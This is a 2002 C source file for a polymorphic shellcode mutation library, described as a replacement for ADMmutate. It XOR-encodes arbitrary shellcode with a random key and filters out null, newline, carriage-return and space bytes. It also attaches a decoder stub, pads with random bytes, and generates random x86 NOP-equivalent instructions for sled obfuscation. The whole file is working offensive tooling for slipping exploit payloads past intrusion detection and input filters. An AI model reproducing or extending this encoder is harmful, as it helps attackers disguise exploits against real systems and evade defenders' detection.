/*
 * fish stiqz - July 2002.
 *
 * the beginnings of a polymorphic shellcode API for use as 
 * a replacement for ADMmutate and the like.. and for fun.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>

#include "scmutate.h"
#include "util.h"

extern int errno;

int
sc_int16_has_byte(u_int32_t i, char byte)
{
    if ((i & 0x000000ff) == byte ||
        ((i & 0x0000ff00) >> 8) == byte) 
        return 1;
    return 0;
}

int
sc_delta_int32_check (u_int32_t delta)
{
    int j, i;

    for (i = 0 ; i < 32 ; i += 8) {
        j = (delta >> i) & 0xff;
        if (j == '\0' || j == '\n' ||
            j == '\r' || j == ' ')
            return 1;
    }
    return 0;
}

int
sc_mem_has_byte(void *ptr, size_t memsize, char byte)
{
    char *c_ptr;
    size_t i;
    int r = 0;

    for (i = 0, c_ptr = ptr; i < memsize; i++)
    {
        if (c_ptr[i] == byte)
        {
            r = 1; 
            break;
        }
    }

#ifdef DEBUG   
    if (r == 1)
        printf("found 0x%02x\n", byte);
    else
        printf("didn't find 0x%02x\n", byte);
#endif 
    return r;
}

void
sc_xor_words(char *sc, size_t size, u_int32_t delta)
{
    u_int32_t sc_word;
    size_t i;

    for (i = 0; i < size; i += sizeof(u_int32_t))
    {
        sc_word = *((u_int32_t *)&sc[i]);
        *((u_int32_t *)&sc[i]) = delta ^ sc_word;
    }
    return;
} 

u_int32_t 
sc_random_delta(char *sc, size_t sc_size)
{
    u_int32_t rd;
    int found = 0;
    char *sc_test = NULL;  

    for (;;) 
    {
       /* making sure the delta itself is "clean" */
       do {
            rd = random();
#ifdef DEBUG
           printf("trying delta: 0x%08x\n", rd);
#endif
        } while (sc_delta_int32_check (rd));

        sc_test = xmemdup(sc, sc_size);
        sc_xor_words(sc_test, sc_size, rd);
#ifdef DEBUG
       printf("delta is clean, now xoring the sc\n");
#endif

        if (!sc_mem_has_byte(sc_test, sc_size, '\0') &&
            !sc_mem_has_byte(sc_test, sc_size, '\n') &&
            !sc_mem_has_byte(sc_test, sc_size, '\r') &&
            !sc_mem_has_byte(sc_test, sc_size, ' '))
        {
            found = 1;
            break;
        }
        free(sc_test);
    }

    if (found == 1)
        free(sc_test);

    return rd;
} 

void
sc_random_sizes(u_int16_t size, u_int16_t *s_vector1, u_int16_t *s_vector2)
{
    u_int16_t vec1, vec2;
    int i;

    vec1 = vec2 = 0;

    i = ((i = random() % 255) > 250 ? (i - 25) : i); 
    
    for (; i < 256; i++)
    {
        /* skip \n, \r, and space */
        if (i == 0x0a || i == 0x0d || i == 0x20)
            continue;

        vec1 = i;
        vec1 <<= 8;
        vec1 |= i;

        vec2 = size ^ vec1;
#ifdef DEBUG
        printf("size: 0x%04x, vec1: 0x%04x, vec2: 0x%04x\n",
            size, vec1, vec2);
#endif

        if (!sc_int16_has_byte(vec2, '\0') && 
            !sc_int16_has_byte(vec2, '\r') && 
            !sc_int16_has_byte(vec2, '\n') && 
            !sc_int16_has_byte(vec2, ' '))
            break;
    }

    *s_vector1 = vec1;
    *s_vector2 = vec2;
    return;
}

void
sc_fill_random(char *sc, size_t size)
{
    size_t i;

    for (i = 0; i < size; i++)
        sc[i] = ((random() % 254) + 1) & 0xff;

    return;
}

void
sc_hexprint_shellcode(char *sc, size_t size)
{
    int i = 0, x = 0;
    size_t size_counter;
    
    printf("unsigned char shellcode[] = \n\"");
    for (size_counter = 0; size_counter < size; size_counter++)
    {
        if (i++ == 16) i = 1;
        if (i == 1 && x != 0) printf("\"\n\""); 
        x = 1;
        printf("\\x%02x", (unsigned char) *(sc + size_counter));
    }
    printf("\";\n");
}

char *
sc_mutate(char *orig_sc, size_t orig_sc_size, size_t *mutate_size)
{
    u_int16_t size_vector_1, size_vector_2;
    u_int32_t random_delta;
    size_t stubsize, codesize;
    char *mutated_sc, *xord_sc;

    srandom(getpid() * time(NULL));
    stubsize = sizeof(xorword_stub) - 1;

    codesize = orig_sc_size;
    codesize += (4 - (codesize % 4));

#ifdef DEBUG
    printf("codesize: %d\n", codesize);
#endif

    xord_sc = xmalloc(codesize * sizeof(char));
    sc_fill_random(xord_sc, codesize);
    memcpy(xord_sc, orig_sc, orig_sc_size);

    sc_random_sizes(codesize, &size_vector_1, &size_vector_2);
    random_delta = sc_random_delta(xord_sc, codesize);

    mutated_sc = xmalloc((codesize + stubsize + 1) * sizeof(char));
    memcpy(mutated_sc, xorword_stub, stubsize); 

    sc_xor_words(xord_sc, codesize, random_delta);
 
    mutated_sc[STUB_OFF_SIZE1 + 0] = (size_vector_1 & 0xff);
    mutated_sc[STUB_OFF_SIZE1 + 1] = ((size_vector_1 & 0xff00) >> 8);
    
    mutated_sc[STUB_OFF_SIZE2 + 0] = (size_vector_2 & 0xff);
    mutated_sc[STUB_OFF_SIZE2 + 1] = ((size_vector_2 & 0xff00) >> 8);

    *((u_int32_t *)&mutated_sc[STUB_OFF_DELTA]) = random_delta;

    memcpy(mutated_sc + stubsize, xord_sc, codesize); 
    *mutate_size = stubsize + codesize;

#ifdef DEBUG
    printf("polymorphing complete: (%d/0x%04x/0x%04x/0x%08x)\n",
        *mutate_size, size_vector_1, size_vector_2, random_delta);
#endif

    free(xord_sc);

    return mutated_sc;
}    

char
sc_random_nop(void)
{
    /* x86 one-byte instructions that play nicely together */
    static int nops[] = 
    {
        0x40,0x43,0x41,0x42,
        0x47,0x46,0x48,0x4b,
        0x49,0x4a,0x4f,0x4e,
        0x99,0x37,0x3f,0x66,
        0x98,0xf8,0xfc,0xf5,
        0x66,0x27,0x2f,0x9f,
        0x90,0x9e,0xf9,0xfd        
    };

    return (char) nops[random() % array_size(nops)];
}

    
